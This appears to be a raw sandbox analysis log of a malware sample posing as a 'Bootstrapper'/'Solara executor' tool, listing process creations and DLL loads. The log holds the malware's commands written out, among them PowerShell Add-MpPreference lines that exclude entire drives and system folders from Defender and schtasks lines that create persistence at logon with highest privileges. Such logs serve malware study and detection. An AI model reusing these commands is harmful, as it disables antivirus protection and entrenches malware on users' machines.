                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: unknownProcess created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                    Source: unknownProcess created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeProcess created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe "C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe" Jump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeProcess created: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe"Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /fJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /fJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /fJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: shfolder.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\BootstrapperV1.19.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
